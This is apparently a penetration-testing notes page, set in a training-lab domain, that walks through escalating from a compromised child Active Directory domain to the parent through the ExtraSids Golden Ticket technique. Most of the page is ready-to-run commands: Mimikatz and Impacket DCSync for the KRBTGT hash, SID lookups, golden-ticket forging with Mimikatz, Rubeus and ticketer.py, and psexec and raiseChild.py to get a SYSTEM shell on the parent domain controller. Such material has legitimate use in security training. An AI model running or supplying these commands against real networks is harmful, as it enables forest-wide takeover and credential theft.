Child->Parent Trust

Windows

ExtraSids Attack - Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain that has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the SIDHistory to grant an account (or non-existent account) Enterprise Admin rights by modifying this attribute to contain the SID for the Enterprise Admins group, which will give us full access to the parent domain without actually being part of the group.

Here's what we first need:

The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.

Note: Here we assume that - child domain FQDN = LOGISTICS.INLANEFREIGHT.LOCAL and parent domain FQDN = INLANEFREIGHT.LOCAL

Now we can gather each piece of data required to perform the ExtraSids attack. First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account.

Here, we assume we have already compromised the child domain, so we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account.

We can obtain the KRBTGT account's NT Hash using Mimikatz:

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

Next we get the domain SID:

Get-DomainSID

Next we need to get the SID for the Enterprise Admins group in the parent domain. We can use Get-DomainGroup from PowerView. We could also do this with the Get-ADGroup cmdlet with a command such as Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL".

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Assuming this is what we have so far:

The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker
The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Now that we have everything we need, using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain.

mimikatz.exe
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

After that we need to confirm that the Kerberos ticket for the non-existent hacker user is residing in memory using the command klist.

Now if we run this command access parent domain file system which we couldn't do before we now show have access:

ls \\academy-ea-dc01.inlanefreight.local\c$

ExtraSids Attack - Rubeus

Again, if we run this it will show access denied:

ls \\academy-ea-dc01.inlanefreight.local\c$

Now using the same data but using Rubeus we can try this attack:

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Final - DCSync Parent Domain

Finally, we can test this access by performing a DCSync attack against the parent domain, targeting the lab_adm Domain Admin user.

.\mimikatz.exe
lsadump::dcsync /user:INLANEFREIGHT\lab_adm

When dealing with multiple domains and our target domain is not the same as the user's domain, we will need to specify the exact domain to perform the DCSync operation on the particular domain controller. The command for this would look like the following:

lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

Linux

Again, we assume we have compromised the child domain and we have admin level access.

Impacket

Performing DCSync with secretdump.py:

secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt

Next, we can use lookupsid.py from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for a SID lookup.

lookupsid.py logistics.inlanefreight.local/[email protected]

Next, we will get the SID for "Enterprise Admins" account:

lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"

And we attach it with the domain SID. Now we have all the data we need to perform our attack. To do that we can use ticketer.py from the Impacket toolkit to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and the parent domain (specified by -extra-sid).

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials. Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts.

export KRB5CCNAME=hacker.ccache

We can check if we can successfully authenticate to the parent domain's Domain Controller using Impacket's version of Psexec. If successful, we will be dropped into a SYSTEM shell on the target Domain Controller.

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5

Psexec can also be used to connect to any user if we know the username and password. Lets say for a user that is a Domain Admin and log into the DC with a shell:

psexec.py sapsso:[email protected]

Autopwn raiseChild.py

Impacket also has the tool raiseChild.py, which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain; the script will do the rest. If we walk through the output, we see that it starts by listing out the child and parent domain's fully qualified domain names (FQDN). It then:

Obtains the SID for the Enterprise Admins group of the parent domain
Retrieves the hash for the KRBTGT account in the child domain
Creates a Golden Ticket
Logs into the parent domain
Retrieves credentials for the Administrator account in the parent domain

Finally, if the target-exec switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

PreviousAD Trust Exploitation NextForest->Forest Trust

Last updated 1 year ago

Was this helpful?